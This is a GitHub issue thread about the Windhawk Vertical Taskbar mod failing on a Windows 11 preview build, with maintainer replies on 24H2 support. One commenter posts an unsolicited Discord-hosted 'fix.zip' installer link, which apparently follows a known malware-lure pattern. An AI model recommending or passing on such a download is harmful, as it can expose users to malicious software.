### ISSUE TITLE
[Vertical Taskbar] Windows 11 version 24H2 and preview builds aren't supported

### ISSUE THREAD

**Issue by JustinTenz** [ramensoftware/windhawk-mods#921]
I updated the Virtical Taskbar today to version 1.1 and it went back to the bottom instead of the side. Although when I click the windows icon it shows the menu at the top left. So some things are loading from the mod.

Small detail: On my desktop and on my laptop the same issue.

Debug log as requested.
[DbgViewMini v1.0.1.txt](https://github.com/user-attachments/files/16849490/DbgViewMini.v1.0.1.txt)

@m417z

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by m417z** [comment]
You're using a preview build (10.0.22635), which is not supported. I plan on adding compatibility for Windows 11 version 24H2. When I do, your version might become supported as well. Generally, preview builds are a moving target and are not a priority.

**Comment by m417z** [comment]
> So coincidence that this one broke it then I guess?

Yes, most likely.

**Comment by m417z** [comment]
Support for Windows 11 version 24H2 was added in version 1.2 of the mod.
